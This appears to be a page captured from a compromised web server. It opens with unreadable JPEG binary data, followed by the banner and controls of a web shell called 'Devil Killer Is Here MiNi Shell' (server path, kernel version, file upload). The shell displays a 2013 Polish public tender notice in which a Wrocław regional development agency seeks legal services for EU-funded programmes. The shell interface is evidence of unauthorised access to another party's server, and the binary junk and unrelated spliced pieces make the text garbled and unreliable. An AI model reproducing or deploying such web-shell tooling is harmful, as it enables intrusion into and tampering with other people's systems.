JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/530654-N-2013.html

<p class="kh_header"><b>Wrocław: Świadczenie obsługi prawnej w związku z pełnioną przez Zamawiającego funkcją Regionalnej Instytucji Finansującej (RIF) - obsługi prawnej RIF oraz programów powierzonych Zamawiającemu przez Polską Agencję Rozwoju Przedsiębiorczości i Samorząd Województwa Dolnośląskiego</b><br>
<b>Numer ogłoszenia: 530654 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławska  Agencja Rozwoju Regionalnego S.A. , ul. Karmelkowa 29, 52-437 Wrocław, woj. dolnośląskie, tel. 071 79 70 400, faks 071 79 70 407.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego z większościowym udziałem samorządu województwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie obsługi prawnej w związku z pełnioną przez Zamawiającego funkcją Regionalnej Instytucji Finansującej (RIF) - obsługi prawnej RIF oraz programów powierzonych Zamawiającemu przez Polską Agencję Rozwoju Przedsiębiorczości i Samorząd Województwa Dolnośląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie obsługi prawnej w związku z pełnioną przez Zamawiającego funkcją Regionalnej Instytucji Finansującej (zwanej dalej: RIF) - świadczenie obsługi prawnej RIF oraz programów powierzonych Zamawiającemu przez Polską Agencję Rozwoju Przedsiębiorczości i Samorząd Województwa Dolnośląskiego.
Obsługa prawna RIF obejmuje w szczególności:
a)wydawanie opinii prawnych, informacji prawnych oraz wyjaśnień w zakresie stosowania prawa, ze szczególnym uwzględnieniem pomocy prawnej z zakresu programów i projektów współfinansowanych z Funduszy Unii Europejskiej oraz krajowych środków publicznych,
b)świadczenie pomocy prawnej w ramach procedury udzielania zamówień publicznych, w szczególności odnośnie wyboru trybu udzielania zamówienia oraz w toku postępowania, w tym w ramach formalnej oceny ofert,
c)uzgadnianie umów zawieranych przez Zamawiającego oraz opracowywanie projektów umów nietypowych lub skomplikowanych pod względem prawnym,
d)opiniowanie projektów aktów wewnętrznych (uchwał, zarządzeń), wydawanych w zakresie pełnienia przez Zamawiającego funkcji RIF,
e)reprezentowanie przed sądami i innymi organami,
f)opracowywanie wniosków zgodnie z procedurą określoną w ustawie Ordynacja podatkowa w sprawie wydawania decyzji dotyczących wiążących interpretacji przepisów podatkowych,
g)informowanie o istotnych zmianach w przepisach prawnych dotyczących pełnienia przez Zamawiającego funkcji RIF.

W ramach obsługi prawnej RIF oraz programów powierzonych Zamawiającemu przez Polską Agencję Rozwoju Przedsiębiorczości i Samorząd Województwa Dolnośląskiego, na dzień zawierania umowy o świadczenie obsługi prawnej RIF Wykonawca jest zobowiązany m.in. do:
a)w zakresie pełnienia przez Zamawiającego funkcji RIF w ramach Programu Operacyjnego Innowacyjna Gospodarka (zwanego dalej: PO IG), Działanie 1.4 - Wsparcie  projektów celowych, Działanie 4.1 - Wsparcie wdrożeń wyników prac B+R, Działanie 4.2 - Stymulowanie działalności B+R oraz wsparcie w zakresie wzornictwa przemysłowego, Działanie 4.4 - Nowe inwestycje o wysokim potencjale innowacyjnym, Działanie 6.1 - Paszport do eksportu, Działanie 8.1 - Wspieranie działalności gospodarczej w dziedzinie gospodarki elektronicznej, Działanie 8.2 - Wspieranie wdrażania elektronicznego biznesu typu B2B, Działanie 5.4.1 - Wsparcie na uzyskanie, realizację ochrony własności przemysłowej, Pilotaż PO IG - Wsparcie na pierwsze wdrożenie wynalazku:
1.wsparcia pracowników informujących przedsiębiorców o możliwości udzielenia dotacji w sytuacji bieżących wątpliwości natury prawnej,
2.wydawania opinii i informacji prawnych związanych z oceną wniosków o dofinansowanie,
3. wydawania opinii i informacji prawnych związanych z postępowaniem odwoławczym w zakresie oceny wniosków o dofinansowanie,
4.wydawania opinii i informacji prawnych związanych z wątpliwościami natury prawnej wynikłymi w procesie przygotowania i podpisywania umów z beneficjentami, w szczególności w zakresie określania statusu wnioskodawców lub beneficjentów w aspekcie definicji MŚP,
5.wydawania opinii i informacji prawnych związanych z Prawem wekslowym,
6.wydawania opinii i informacji prawnych w zakresie stosowania przez beneficjentów ustawy Prawo zamówień publicznych,
7.wydawania opinii i informacji prawnych w zakresie stosowania przez beneficjentów przepisów z zakresu ochrony środowiska,
8.wydawania opinii i informacji prawnych w zakresie stosowania przez beneficjentów przepisów z zakresu prawa budowlanego,
9.wydawania opinii i informacji prawnych w zakresie wydawania przez RIF zaświadczeń dotyczących pomocy de minimis,
10.wydawania opinii i informacji prawnych w zakresie realizowanej przez pracowników RIF weryfikacji umów o świadczenie usług z wybranym wykonawcą partnerem biznesowym oraz umów kredytowych, leasingu i cesji,
11.wydawania opinii i informacji prawnych w zakresie przygotowywanych aneksów,
12.wydawania opinii i informacji prawnych związanych z procesem monitorowania realizacji umów o udzielenie wsparcia zawartych w ramach działań z beneficjentami,
13.wydawania opinii i informacji prawnych związanych z procesem weryfikacji wniosków o wypłatę wsparcia, weryfikacją dokumentów finansowych, analizą raportów merytorycznych,
14.wydawania opinii i informacji prawnych związanych z oceną kwalifikowalności wydatków w ramach umów o dofinansowanie,
15.wydawania opinii i informacji prawnych związanych z oceną występowania konfliktu interesów w realizacji umów o dofinansowanie,
16.wydawania opinii i informacji prawnych związanych z procesem kontroli trwałości projektów realizowanych przez beneficjentów,
17.wydawania opinii i informacji prawnych związanych z wątpliwościami natury prawnej wynikłymi w procesie wykrywania nieprawidłowości i rozwiązania umów z beneficjentami,
18.wydawania opinii i informacji prawnych związanych z wątpliwościami natury prawnej wynikłymi w procesie zbierania danych i informacji dotyczących bezpieczeństwa,
19.zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz doradztwa prawnego w zakresie zastępstwa procesowego,
20.zastępstwa w postępowaniach egzekucyjnych prowadzonych przeciwko beneficjentom w celu odzyskania wypłaconego dofinansowania wraz z odsetkami i kosztami,
21.zastępstwa w innych postępowaniach prowadzonych w związku z realizacją programu,
22.wsparcia pracowników RIF w zakresie bieżących wątpliwości natury prawnej;

b)w zakresie pełnienia przez Zamawiającego funkcji RIF w ramach programów zakończonych PHARE, Sektorowego Programu Operacyjnego Wzrost Konkurencyjności Przedsiębiorstw, Sektorowego Programu Operacyjnego Rozwój Zasobów Ludzkich:
1. wydawania opinii i informacji prawnych związanych z Prawem wekslowym,
2. wydawania opinii i informacji prawnych w zakresie stosowania przez beneficjentów ustawy Prawo zamówień publicznych,
3.wydawania opinii i informacji prawnych w zakresie realizowanej przez pracowników RIF weryfikacji umów o świadczenie usług z wybranym wykonawcą oraz umów kredytowych, leasingu i cesji,
4.wydawania opinii i informacji prawnych w zakresie przygotowywanych aneksów,
5.wydawania opinii i informacji prawnych związanych z procesem monitorowania realizacji umów o udzielenie wsparcia zawartych w ramach działań z beneficjentami,
6.wydawania opinii i informacji prawnych związanych z weryfikacją dokumentów finansowych, analizą raportów merytorycznych,
7.wydawania opinii i informacji prawnych związanych z procesem kontroli trwałości projektów realizowanych przez beneficjentów,
8.wydawania opinii i informacji prawnych związanych z wątpliwościami natury prawnej wynikłymi w procesie wykrywania nieprawidłowości i rozwiązywania umów z beneficjentami,
9.zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz doradztwa prawnego w zakresie zastępstwa procesowego, w szczególności w sprawach o zwrot dofinansowania wypłaconego beneficjentom programów, podlegającego zwrotowi w związku ze stwierdzeniem uchybień w realizacji projektów, w tym naruszenia obowiązku zachowania trwałości projektu,
10.zastępstwa w postępowaniach egzekucyjnych prowadzonych przeciwko beneficjentom w celu odzyskania wypłaconego dofinansowania wraz z odsetkami i kosztami,
11.zastępstwa w innych postępowaniach prowadzonych w związku z realizacją programów,
12. wsparcia pracowników RIF w zakresie bieżących wątpliwości natury prawnej;

c)w zakresie wdrażania Zintegrowanego Programu Operacyjnego Rozwoju Regionalnego (zwanego dalej: ZPORR) Działanie 3.4 Mikroprzedsiębiorstwa:
1.wydawania opinii i informacji prawnych związanych z Prawem wekslowym,
2.wydawania opinii i informacji prawnych w zakresie stosowania przez beneficjentów ustawy Prawo zamówień publicznych,
3.wydawania opinii i informacji prawnych w zakresie umów z beneficjentami,
4.wydawania opinii i informacji prawnych w zakresie przygotowywanych aneksów,
5.wydawania opinii i informacji prawnych związanych z procesem monitorowania realizacji umów o udzielenie wsparcia zawartych w ramach programu z beneficjentami,
6.wydawania opinii i informacji prawnych związanych z procesem kontroli trwałości projektów realizowanych przez beneficjentów,
7.wydawania opinii i informacji prawnych związanych z wątpliwościami natury prawnej wynikłymi w procesie wykrywania nieprawidłowości i rozwiązania umów z beneficjentami,
8.zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz doradztwa prawnego w zakresie zastępstwa procesowego, w szczególności w sprawach o zwrot dofinansowania wypłaconego beneficjentom w ramach ZPORR Działanie 3.4 Mikroprzedsiębiorstwa, podlegającego zwrotowi w związku ze stwierdzeniem uchybień w realizacji projektów, w tym naruszenia obowiązku zachowania trwałości projektu,
9.zastępstwa w postępowaniach egzekucyjnych prowadzonych przeciwko beneficjentom w celu odzyskania wypłaconego dofinansowania wraź z odsetkami i kosztami,.
10.zastępstwa w innych postępowaniach prowadzonych w związku z realizacją programu,
11.wsparcia pracowników RIF w zakresie bieżących wątpliwości natury prawnej.

Wykonawca zobowiązany jest świadczyć obsługę prawną w Biurze RIF cztery razy w tygodniu, w tym: trzy razy w wymiarze ośmiu godzin oraz jeden raz w wymiarze czterech godzin, w terminie ustalonym z Zamawiającym, a dodatkowo w razie zaistnienia takiej potrzeby również w siedzibie Wykonawcy. Obsługa prawna świadczona jest przez co najmniej dwie osoby posiadające doświadczenie w zakresie wskazanym w Rozdziale 4 pkt 4.1.3 lit. a) - c) SIWZ, z tym że na dyżurach w Biurze RIF, o którym mowa w zdaniu poprzednim, co najmniej dwa razy w tygodniu obecna jest jedna osoba posiadająca doświadczenie w zakresie wskazanym w Rozdziale 4 pkt 4.1.3 lit. a) SIWZ, zaś na pozostałych dyżurach - jedna osoba posiadająca doświadczenie w zakresie wskazanym w Rozdziale 4 pkt 4.1.3 lit. a) - c) SIWZ. Zamawiający dopuszcza wykonywanie czynności pomocy prawnej wyłącznie przez osoby posiadające w/w doświadczenie, wskazane w ofercie Wykonawcy - Wykazie osób, o których mowa w Rozdziale 5 pkt 5.1.3 SIWZ. Z uwagi na konieczność sprawdzania i akceptowania dokumentacji tworzonej lub przedkładanej w związku z obsługą wskazanych wyżej programów, osoby świadczące obsługę prawną świadczą w pozostałe dni tygodnia obsługę prawną we Wrocławiu w miejscu dostępnym środkami komunikacji miejskiej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek udziału w postępowaniu został spełniony, na podstawie oświadczenia Wykonawcy złożonego zgodnie ze wzorem stanowiącym Załącznik nr 2 do SIWZ, o którym mowa w Rozdziale 5 pkt 5.1.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał lub wykonuje usługi prawne zbieżne z przedmiotem zamówienia, tj.:
a)wykonywał (lub wykonuje) przez okres co najmniej jednego roku kompleksową obsługę prawną podmiotu pełniącego rolę regionalnej instytucji finansującej w rozumieniu art. 6d ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późń. zm.), oraz 
b)wykonał i zakończył (przez co rozumie się uzyskanie prawomocnego wyroku) co najmniej jedną usługę obsługi prawnej RIF polegającą na zastępstwie procesowym w sprawach o zwrot dofinansowania udzielonego w ramach programów lub projektów współfinansowanych z Funduszy Unii Europejskiej oraz krajowych środków publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że będzie dysponować łącznie co najmniej pięcioma osobami spełniającymi następujące warunki:
a)co najmniej dwiema osobami wpisanymi na listę radców prawnych lub adwokatów, posiadającymi co najmniej pięcioletnie doświadczenie w wykonywaniu zawodu radcy prawnego lub adwokata, w tym co najmniej pięcioletnie doświadczenie procesowe, oraz posiadającymi co najmniej trzyletnie w okresie ostatnich pięciu lat przed upływem terminu składania ofert doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF, oraz
b)co najmniej jedną osobą wpisaną na listę radców prawnych lub adwokatów, posiadającą co najmniej trzyletnie doświadczenie w wykonywaniu zawodu radcy prawnego lub adwokata, w tym co najmniej trzyletnie doświadczenie procesowe, oraz posiadającą co najmniej trzyletnie doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF, oraz 
c)co najmniej dwiema osobami wpisanymi na listę radców prawnych lub adwokatów, posiadającymi doświadczenie procesowe oraz posiadającymi co najmniej sześciomiesięczne doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF lub jednostek samorządu terytorialnego lub podmiotów z udziałem jednostek samorządu terytorialnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że będzie dysponować łącznie co najmniej pięcioma osobami spełniającymi następujące warunki:
a)co najmniej dwiema osobami wpisanymi na listę radców prawnych lub adwokatów, posiadającymi co najmniej pięcioletnie doświadczenie w wykonywaniu zawodu radcy prawnego lub adwokata, w tym co najmniej pięcioletnie doświadczenie procesowe, oraz posiadającymi co najmniej trzyletnie w okresie ostatnich pięciu lat przed upływem terminu składania ofert doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF, oraz
b)co najmniej jedną osobą wpisaną na listę radców prawnych lub adwokatów, posiadającą co najmniej trzyletnie doświadczenie w wykonywaniu zawodu radcy prawnego lub adwokata, w tym co najmniej trzyletnie doświadczenie procesowe, oraz posiadającą co najmniej trzyletnie doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF, oraz 
c)co najmniej dwiema osobami wpisanymi na listę radców prawnych lub adwokatów, posiadającymi doświadczenie procesowe oraz posiadającymi co najmniej sześciomiesięczne doświadczenie w wykonywaniu kompleksowej obsługi prawnej na rzecz RIF lub jednostek samorządu terytorialnego lub podmiotów z udziałem jednostek samorządu terytorialnego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek udziału w postępowaniu został spełniony, na podstawie oświadczenia Wykonawcy złożonego zgodnie ze wzorem stanowiącym Załącznik nr 2 do SIWZ, o którym mowa w Rozdziale 5 pkt 5.1.1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie dodatkowe - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WROCŁAWSKA AGENCJA ROZWOJU REGIONALNEGO SA
ul. Krupnicza 13, 50-075 Wrocław, piętro IV

 i 

WROCŁAWSKA AGENCJA ROZWOJU REGIONALNEGO S.A.
ul. Karmelkowa 29, 52-437 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2013 godzina 13:00, miejsce: WROCŁAWSKA AGENCJA ROZWOJU REGIONALNEGO SA
ul. Krupnicza 13, 50-075 Wrocław, piętro IV.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej z racji pełnienia przez Zamawiającego funkcji Regionalnej Instytucji Finansującej Programu Operacyjnego Innowacyjna Gospodarka..</p>
